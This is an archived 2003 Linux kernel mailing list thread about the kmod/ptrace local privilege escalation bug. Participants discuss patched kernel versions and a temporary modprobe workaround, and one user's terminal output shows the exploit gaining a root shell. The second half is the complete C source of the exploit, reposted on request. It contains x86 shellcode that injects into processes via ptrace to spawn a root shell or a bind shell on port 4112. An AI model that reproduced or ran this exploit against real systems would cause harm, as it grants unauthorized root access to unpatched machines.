You can download working exploit on
http://www.members.ee/ptrace-exploit.c
Its hell long exploit as I know, and still not patched!
On Wed, 19 Mar 2003, Andrus wrote:
> You can download working exploit on
> http://www.members.ee/ptrace-exploit.c
>
> Its hell long exploit as I know, and still not patched!
>
I have it, it's no longer on that URL, but I test it against the last
errata kernel from RedHat and it's not vulnerable.
[rmaureira@linux rmaureira]$ ./ptrace-xploit
[-] Unable to attach: Operation not permitted
Killed
Best regards
--
Robinson Maureira Castillo
INACAP
On Wed, 2003-03-19 at 13:54, Andrus wrote:
> You can download working exploit on
> http://www.members.ee/ptrace-exploit.c
>
> Its hell long exploit as I know, and still not patched!
The ptrace problems I'm aware of are fixed in 2.2.25 or by the patch
to 2.4.21pre5-ac I posted (I meant to post the 2.4.20 one, someone
has since done that).
Vendor updates seem to be available for most distro/architectures
although S/390 seems to be lagging in a few cases
On Wed, 2003-03-19 at 15:13, Robinson Maureira Castillo wrote:
> On Wed, 19 Mar 2003, Andrus wrote:
> > You can download working exploit on
> > http://www.members.ee/ptrace-exploit.c
> >
> > Its hell long exploit as I know, and still not patched!
> >
>
> I have it, it's no longer on that URL, but I test it against the last
> errata kernel from RedHat and it's not vulnerable.
>
> [rmaureira@linux rmaureira]$ ./ptrace-xploit
> [-] Unable to attach: Operation not permitted
> Killed
there is some misunderstanding about at least one of the exploits out
there; one of them will, when successful, make itself setuid-root....
result:
admin tries exploit, succeeds
admin updates kernel to fixed one
admin tries exploit, gets root again due to setuid-root and thinks the
kernel is not fixed
admin yells at $vendor for providing a broken fix
On 19 Mar 2003, Alan Cox wrote:
> > Its hell long exploit as I know, and still not patched!
> The ptrace problems I'm aware of are fixed in 2.2.25 or by the patch
> to 2.4.21pre5-ac I posted (I meant to post the 2.4.20 one, someone
> has since done that).
Well for me it didn't work on those kernels (all was i386 "of
course"):
2.4.19-pre6aa1
2.4.21-pre4aa1
2.4.21-pre4aa3
2.2.16pre7
Did work on lot's of others (unpatched 2.4.x, 2.2.x, 2.4.x-acx,
2.4.x-ckx).
--
Woockie
..."what is there in this world that makes living worthwhile?"
Death thought about it. "CATS," he said eventually, "CATS ARE NICE."
(Terry Pratchett, Sourcery)
On Wed, 2003-03-19 at 14:55, Anders Gustafsson wrote:
> If access can't be shut down while compiling the new kernel
>
> echo /foo/bar/doesnotexist >/proc/sys/kernel/modprobe
>
> would help, wouldn't it?
Against the default exploit circulating yes, in the general
case we don't believe so. Realistically we are a day or two
before a major war breaks out with huge amounts of bad
feeling involved. It is not the time to put off security
updates, especially if you have a potentially US or UK domain
name/address range
On Wed, Mar 19, 2003 at 03:27:05PM +0000, Alan Cox wrote:
> On Wed, 2003-03-19 at 13:54, Andrus wrote:
> > You can download working exploit on
> > http://www.members.ee/ptrace-exploit.c
> >
> > Its hell long exploit as I know, and still not patched!
>
> The ptrace problems I'm aware of are fixed in 2.2.25 or by the patch
> to 2.4.21pre5-ac I posted (I meant to post the 2.4.20 one, someone
> has since done that).
If access can't be shut down while compiling the new kernel
echo /foo/bar/doesnotexist >/proc/sys/kernel/modprobe
would help, wouldn't it?
--
Anders Gustafsson - [email protected] - http://0x63.nu/
On Wed, Mar 19, 2003 at 04:13:05PM +0000, Alan Cox wrote:
> On Wed, 2003-03-19 at 14:55, Anders Gustafsson wrote:
> > If access can't be shut down while compiling the new kernel
> >
> > echo /foo/bar/doesnotexist >/proc/sys/kernel/modprobe
> >
> > would help, wouldn't it?
>
> Against the default exploit circulating yes, in the general
> case we don't believe so.
Ah, there might be other stuff than modprobe that execs out of a
kernelthread. But to exploit the kernelthread must execve so there is a
userspaceprocess to ptrace, right?
--
Anders Gustafsson - [email protected] - http://0x63.nu/
On Wed, 19 Mar 2003, BODA Karoly jr. wrote:
> Well for me it didn't work on those kernels (all was i386 "of
> course"):
> 2.4.19-pre6aa1
> 2.4.21-pre4aa1
> 2.4.21-pre4aa3
> 2.2.16pre7
I must fix this. On those kernels WORKS the exploit. :( I've tried
lots of times (>100) to run simply the exploit didn't work. But when I
wanted to trace what the difference is it was working. :( I didn't try
the other versions I think it will work too... strace of course is not
setuid root. Here it goes:
woockie@death:~/tmp$ ls -l ptrace
-rwxr-xr-x 1 woockie woockie 9031 Mar 19 14:59 ptrace
woockie@death:~/tmp$ strace -o /dev/null -f -F ./ptrace
Process 4003 attached
[+] Attached to 4004
[+] Signal caught
[+] Shellcode placed at 0x4000da2d
umovestr: Input/output error
[+] Now wait for suid shell...
Process 4005 attached
Process 4002 suspended
Process 4003 detached
PTRACE_ATTACH: Operation not permitted
Too late?
PTRACE_ATTACH: Operation not permitted
Too late?
[1]+ Stopped strace -o /dev/null -f -F ./ptrace
woockie@death:~/tmp$ killall strace
woockie@death:~/tmp$ ls -l ptrace
-rwsr-sr-x 1 root root 9031 Mar 19 14:59 ptrace
woockie@death:~/tmp$ ./ptrace
root@death:~/tmp#
--
Woockie
..."what is there in this world that makes living worthwhile?"
Death thought about it. "CATS," he said eventually, "CATS ARE NICE."
(Terry Pratchett, Sourcery)
P.S.: sorry for the previous mail :( Can anyone explain me why this works
only this way?
On Wednesday 19 March 2003 08:54 am, Andrus wrote:
> You can download working exploit on
> http://www.members.ee/ptrace-exploit.c
>
> Its hell long exploit as I know, and still not patched!
>
>
> -
> To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
> the body of a message to [email protected]
> More majordomo info at http://vger.kernel.org/majordomo-info.html
> Please read the FAQ at http://www.tux.org/lkml/
This exploit is no longer available at that URL. Can it please be either
reposted here or mailed directly to me?
--
Rick Warner
Systems Integrator
"In a world without fences and doors, who needs Gates and Windows?"
/* lame, oversophisticated local root exploit for kmod/ptrace bug in linux
* 2.2 and 2.4
*
* have fun
*/
#define ANY_SUID "/usr/bin/passwd"
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/ptrace.h>
#include <linux/user.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <asm/ioctls.h>
#include <getopt.h>
// user settings:
int randpids=0;
#define M_SIMPLE 0
#define M_DOUBLE 1
#define M_BIND 2
int mode=M_SIMPLE;
char * bin=NULL;
struct stat me;
int chldpid;
int hackpid;
// flags
int sf=0;
int u2=0;
void killed(int a) { u2=1; }
void synch(int x){ sf=1; }
// shellcode to inject
unsigned char shcode[1024];
char ptrace_code[]="\x31\xc0\xb0\x1a\x31\xdb\xb3\x10\x89\xf9"
"\xcd\x80\x85\xc0\x75\x41\xb0\x72\x89\xfb\x31\xc9\x31\xd2\x31\xf6"
"\xcd\x80\x31\xc0\xb0\x1a\x31\xdb\xb3\x03\x89\xf9\xb2\x30\x89\xe6"
"\xcd\x80\x8b\x14\x24\xeb\x36\x5d\x31\xc0\xb0\xFF\x89\xc7\x83\xc5"
"\xfc\x8b\x75\x04\x31\xc0\xb0\x1a\xb3\x04\xcd\x80\x4f\x83\xed\xfc"
"\x83\xea\xfc\x85\xff\x75\xea\x31\xc0\xb0\x1a\x31\xdb\xb3\x11\x31"
"\xd2\x31\xf6\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xc5\xff"
"\xff\xff";
char execve_tty_code[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\x31\xc0\x50\x68"
"\x2f\x74\x74\x79\x68\x2f\x64\x65\x76\x89\xe3\xb0\x05\x31\xc9\x66"
"\xb9\x41\x04\x31\xd2\x66\xba\xa4\x01\xcd\x80\x89\xc3\x31\xc0\xb0"
"\x3f\x31\xc9\xb1\x01\xcd\x80\x31\xc0\x50\xeb\x13\x89\xe1\x8d\x54"
"\x24\x04\x5b\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8"
"\xe8\xff\xff\xff";
char execve_code[]="\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\xb0\x46"
"\x31\xc0\x50\xeb\x13\x89\xe1\x8d\x54\x24\x04\x5b\xb0\x0b\xcd\x80"
"\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe8\xff\xff\xff";
char bind_code[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\x31\xc0\x50\x40"
"\x50\x40\x50\x8d\x58\xff\x89\xe1\xb0\x66\xcd\x80\x83\xec\xf4\x89"
"\xc7\x31\xc0\xb0\x04\x50\x89\xe0\x83\xc0\xf4\x50\x31\xc0\xb0\x02"
"\x50\x48\x50\x57\x31\xdb\xb3\x0e\x89\xe1\xb0\x66\xcd\x80\x83\xec"
"\xec\x31\xc0\x50\x66\xb8\x10\x10\xc1\xe0\x10\xb0\x02\x50\x89\xe6"
"\x31\xc0\xb0\x10\x50\x56\x57\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x83"
"\xec\xec\x85\xc0\x75\x59\xb0\x01\x50\x57\x89\xe1\xb0\x66\xb3\x04"
"\xcd\x80\x83\xec\xf8\x31\xc0\x50\x50\x57\x89\xe1\xb0\x66\xb3\x05"
"\xcd\x80\x89\xc3\x83\xec\xf4\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x74"
"\x08\x31\xc0\xb0\x06\xcd\x80\xeb\xdc\x31\xc0\xb0\x3f\x31\xc9\xcd"
"\x80\x31\xc0\xb0\x3f\x41\xcd\x80\x31\xc0\xb0\x3f\x41\xcd\x80\x31"
"\xc0\x50\xeb\x13\x89\xe1\x8d\x54\x24\x04\x5b\xb0\x0b\xcd\x80\x31"
"\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe8\xff\xff\xff";
// generate shellcode that sets %edi to pid
int pidcode(unsigned char * tgt, unsigned short pid)
{
fprintf(stderr, "pid=%d=0x%08x\n", pid, pid);
tgt[0]=0x31; tgt[1]=0xff;
tgt+=2;
if((pid & 0xff) && (pid & 0xff00)){
tgt[0]=0x66; tgt[1]=0xbf;
*((unsigned short*)(tgt+2))=pid;
return 6;
}else{
int n=2;
if(pid & 0xff00){
tgt[0]=0xB0; tgt[1]=(pid>>8);
tgt+=2; n+=2;
}
memcpy(tgt,"\xC1\xE0\x08", 3); tgt+=3; n+=3;
if(pid & 0xff){
tgt[0]=0xB0; tgt[1]=pid;
tgt+=2; n+=2;
}
tgt[0]=0x89; tgt[1]=0xC7;
return n+2;
}
}
void mkcode(unsigned short pid)
{
int i=0;
unsigned char *c=shcode;
c+=pidcode(c, pid);
strcpy(c, ptrace_code);
c[53]=(sizeof(execve_code)+strlen(bin)+4)/4;
strcat(c, execve_code);
strcat(c, bin);
}
//------------------------
void hack(int pid)
{
int i;
struct user_regs_struct r;
char b1[100]; struct stat st;
int len=strlen(shcode);
if(kill(pid, 0)) return;
sprintf(b1, "/proc/%d/exe", pid);
if(stat(b1, &st)) return;
if(st.st_ino!=me.st_ino || st.st_dev!=me.st_dev) return;
if(ptrace(PTRACE_ATTACH, pid, 0, 0)) return;
while(ptrace(PTRACE_GETREGS, pid, NULL, &r));
fprintf(stderr, "\033[1;33m+ %d\033[0m\n", pid);
if(ptrace(PTRACE_SYSCALL, pid, 0, 0)) goto fail;
while(ptrace(PTRACE_GETREGS, pid, NULL, &r));
for (i=0; i<=len; i+=4)
if(ptrace(PTRACE_POKETEXT, pid, r.eip+i, *(int*)(shcode+i))) goto fail;
kill(chldpid, 9);
ptrace(PTRACE_DETACH, pid, 0, 0);
fprintf(stderr, "\033[1;32m- %d ok!\033[0m\n", pid);
if(mode==M_DOUBLE){
char commands[1024];
char * c=commands;
kill(hackpid, SIGCONT);
sprintf(commands, "\nexport TERM='%s'\nreset\nid\n", getenv("TERM"));
while(*c) { ioctl(0, TIOCSTI, c++); }
waitpid(hackpid, 0, 0);
}
exit(0);
fail:
ptrace(PTRACE_DETACH, pid, 0, 0);
kill(pid, SIGCONT);
}
void usage(char * cmd)
{
fprintf(stderr, "Usage: %s [-d] [-b] [-r] [-s] [-c executable]\n"
"\t-d\t-- use double-ptrace method (to run interactive programs)\n"
"\t-b\t-- start bindshell on port 4112\n"
"\t-r\t-- support randomized pids\n"
"\t-c\t-- choose executable to start\n"
"\t-s\t-- single-shot mode - abort if unsuccessful at the first try\n", cmd);
exit(0);
}
int main(int ac, char ** av, char ** env)
{
int single=0;
char c;
int mypid=getpid();
fprintf(stderr, "Linux kmod + ptrace local root exploit by <[email protected]>\n\n");
if(stat("/proc/self/exe", &me) && stat(av[0], &me)){
perror("stat(myself)");
return 0;
}
while((c=getopt(ac, av, "sbdrc:"))!=EOF) switch(c) {
case 'd': mode=M_DOUBLE; break;
case 'b': mode=M_BIND; break;
case 'r': randpids=1; break;
case 'c': bin=optarg; break;
case 's': single=1; break;
default: usage(av[0]);
}
if(ac!=optind) usage(av[0]);
if(!bin){
if(mode!=M_SIMPLE) bin="/bin/sh";
else{
struct stat qpa;
if(stat((bin="/bin/id"), &qpa)) bin="/usr/bin/id";
}
}
signal(SIGUSR1, synch);
hackpid=0;
switch(mode){
case M_SIMPLE:
fprintf(stderr, "=> Simple mode, executing %s > /dev/tty\n", bin);
strcpy(shcode, execve_tty_code);
strcat(shcode, bin);
break;
case M_DOUBLE:
fprintf(stderr, "=> Double-ptrace mode, executing %s, suid-helper %s\n",
bin, ANY_SUID);
if((hackpid=fork())==0){
char *ble[]={ANY_SUID, NULL};
fprintf(stderr, "Starting suid program %s\n", ANY_SUID);
kill(getppid(), SIGUSR1);
execve(ble[0], ble, env);
kill(getppid(), 9);
perror("execve(SUID)");
_exit(0);
}
while(!sf);
usleep(100000);
kill(hackpid, SIGSTOP);
mkcode(hackpid);
break;
case M_BIND:
fprintf(stderr, "=> portbind mode, executing %s on port 4112\n", bin);
strcpy(shcode, bind_code);
strcat(shcode, bin);
break;
}
fprintf(stderr, "sizeof(shellcode)=%d\n", strlen(shcode));
signal(SIGUSR2, killed);
if(randpids){
fprintf(stderr, "\033[1;31m"
"Randomized pids support enabled... be patient or load the system heavily,\n"
"this method does more brute-forcing\033[0m\n");
}
again:
sf=0;
if((chldpid=fork())==0){
int q;
kill(getppid(), SIGUSR1);
while(!sf);
fprintf(stderr, "=> Child process started");
for(q=0;q<10;++q){
fprintf(stderr, ".");
socket(22,0,0);
}
fprintf(stderr, "\n");
kill(getppid(), SIGUSR2);
_exit(0);
}
while(!sf);
kill(chldpid, SIGUSR1);
for(;;){
int q;
if(randpids){
for(q=1;q<30000;++q)
if(q!=chldpid && q!=mypid && q!=hackpid) hack(q);
}else{
for(q=chldpid+1;q<chldpid+10;q++) hack(q);
}
if(u2){
u2=0;
if(single) break;
goto again;
}
}
fprintf(stderr, "Failed\n");
return 1;
}
// M$ sucks
//
// http://bezkitu.com/